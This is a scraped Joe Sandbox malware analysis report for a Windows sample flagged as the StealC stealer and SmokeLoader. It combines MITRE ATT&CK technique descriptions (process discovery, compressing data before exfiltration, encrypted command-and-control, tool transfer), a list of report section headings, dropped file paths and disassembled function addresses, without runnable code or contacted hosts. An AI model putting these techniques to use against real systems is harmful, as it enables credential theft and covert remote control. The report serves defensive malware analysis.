Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report e0OOofAl0S.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: SmokeLoader

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\D931.exe

C:\Users\user\AppData\Local\Temp\svchost015.exe

C:\Users\user\AppData\Roaming\busaafd

C:\Users\user\AppData\Roaming\busaafd:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
e0OOofAl0S.exe

Function 0041A7A0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 268
librarymemorypipeCOMMON

Function 00401476 Relevance: 10.7, APIs: 7, Instructions: 228
nativeCOMMON

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Function 004014AA Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 004014B1 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Function 004014AD Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Function 004014D5 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Function 00402F55 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 005373AE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 004030B2 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Function 004A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 0041AA64 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
libraryCOMMON

Function 004A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 0041A5C0 Relevance: 1.5, APIs: 1, Instructions: 14
memoryCOMMON

Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre